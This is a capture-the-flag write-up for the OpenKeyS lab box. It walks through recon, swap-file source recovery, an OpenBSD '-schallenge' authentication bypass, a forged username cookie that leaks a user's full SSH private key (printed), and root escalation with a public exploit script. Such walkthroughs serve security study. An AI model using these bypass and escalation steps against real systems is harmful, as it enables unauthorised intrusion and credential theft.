# Box Information

    Name:       | OpenKeyS
    OS:         | OpenBSD
    Difficulty: | Medium
    Points:     | 30
    Release:    | 25 Jul 2020
    IP:         | 10.10.10.199

# Recon

As always I started with an nmap scan:
```
nmap -sC -sV -T4 -p- 10.10.10.199 -oA scans/nmap.full
```
Output:
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 20:16 CEST
Nmap scan report for 10.10.10.199
Host is up (0.048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
|   256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_  256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open  http    OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 729.79 seconds
```

## http - 80

![loginpage](img/loginpage.png)

I gave it `asd:asd` and got an auth error.

![loginerr](img/loginerr.png)

### Directory / File fuzzing

I ran `gobuster` in order to discover some hidden files/directories.

```
gobuster dir -u http://10.10.10.199/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

```
/images (Status: 301)
/index.html (Status: 200)
/index.php (Status: 200)
/css (Status: 301)
/includes (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/fonts (Status: 301)
```

`/includes`:

![includespage](img/includespage.png)

`/includes/auth.php.swp`:

![authphpswpfile](img/authphpswpfile.png)

- It was a VIM swapfile

## Exploring the vim swapfile

I downloaded the file with `wget`:

```
wget http://10.10.10.199/includes/auth.php.swp
```

```
file auth.php.swp
auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php
```

I ran `strings` on the file and I noticed the content was reversed so I used `tac` in order to fix this problem.

```
strings auth.php.swp | tac > fixed_auth.php
```

Restoring it with vim:
```
vim -r auth.php.swp
```

fixed_auth.php:

```php
<?php
function authenticate($username, $password)
    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
    system($cmd, $retcode);
    return $retcode;
function is_active_session()
    // Session timeout in seconds
    $session_timeout = 300;
    // Start the session
    session_start();
    // Is the user logged in? 
    if(isset($_SESSION["logged_in"]))
    {
        // Has the session expired?
        $time = $_SERVER['REQUEST_TIME'];
        if (isset($_SESSION['last_activity']) && 
            ($time - $_SESSION['last_activity']) > $session_timeout)
        {
            close_session();
            return False;
        }
        else
        {
            // Session is active, update last activity time and return True
            $_SESSION['last_activity'] = $time;
            return True;
        }
    }
    else
    {
        return False;
    }
function init_session()
    $_SESSION["logged_in"] = True;
    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
    $_SESSION["username"] = $_REQUEST['username'];
function close_session()
    session_unset();
    session_destroy();
    session_start();
#"! 
3210
/var/www/htdocs/includes/auth.php
openkeys.htb
jennifer
b0VIM 8.1
```

- /var/www/htdocs/includes/auth.php
- openkeys.htb
- jennifer

The line I needed:
```php
$cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
```

# Exploitation

## Searching for exploits

I searched for `openbsd auth bypass` in ddg and found [this](https://thehackernews.com/2019/12/openbsd-authentication-vulnerability.html) article.

![authbypasscve](img/authbypasscve.png)

- If I give `-schallenge` as username and literally anything for password and I must get logged in.

## Bypassing loginpage with the CVE

My creds were: `-schallenge:asd`

![logincreds](img/logincreds.png)

I got in but I got an error which mentions `-schallenge` has no ssh key.

![nosshkeyerr](img/nosshkeyerr.png)

## Guessing the username cookie

I made a cookie with cookie editor(firefox extension) called `username` and the value was `jennifer`.

![customcookie](img/customcookie.png)

Then I refreshed the page and logged in again with `-schallenge:asd` and I successfully got **jennifer's private ssh key**!

![jenniferkey](img/jenniferkey.png)

- I saved it to a local file

jennifer.priv:
    -----BEGIN OPENSSH PRIVATE KEY-----
    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
    -----END OPENSSH PRIVATE KEY-----

- I used it to log into ssh as jennifer

```
ssh -i jennifer.priv jennifer@10.10.10.199
```

![gotuser_jennifer](img/gotuser_jennifer.png)

```
openkeys$ hostname;id
openkeys.htb
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
```

- I also had access to the user flag(`/home/jennifer/user.txt:36ab2----------------------d2b10`)

# Privilege Escalation

## Auth exploit

After some searching I found a privesc method on openbsd with the combination of 2 CVEs.

[github.com/bcoles/local-exploits/blob/master/CVE-2019-19520/openbsd-authroot](https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19520/openbsd-authroot)

- [local copy](expl/openbsd-authroot)

### Transfering the script

I used `scp` in order to send the script to the target box.

```
scp -i ../files/http/jennifer.priv openbsd-authroot jennifer@10.10.10.199:authroot.sh
```

### Execution

Then I just ran it.

```
./authroot.sh
```

![gotuser_root](img/gotuser_root.png)

```
openkeys# hostname;id
openkeys.htb
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
```

- Since I'm root I have access to the root flag(`/root/root.txt:f3a55----------------------c6efa`)

# +Interesting fact

The root hash in OpenBSD systems are located at `/etc/master.passwd`.

```
cat /etc/master.passwd
root:$2b$10$4t4M4-------------------------------------------jjkBG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh
---SNIP---
jennifer:$2b$08$4QwHs-------------------------------------------QA1fG:1001:1001::0:0:Jennifer Miller,,,:/home/jennifer:/bin/ksh
```
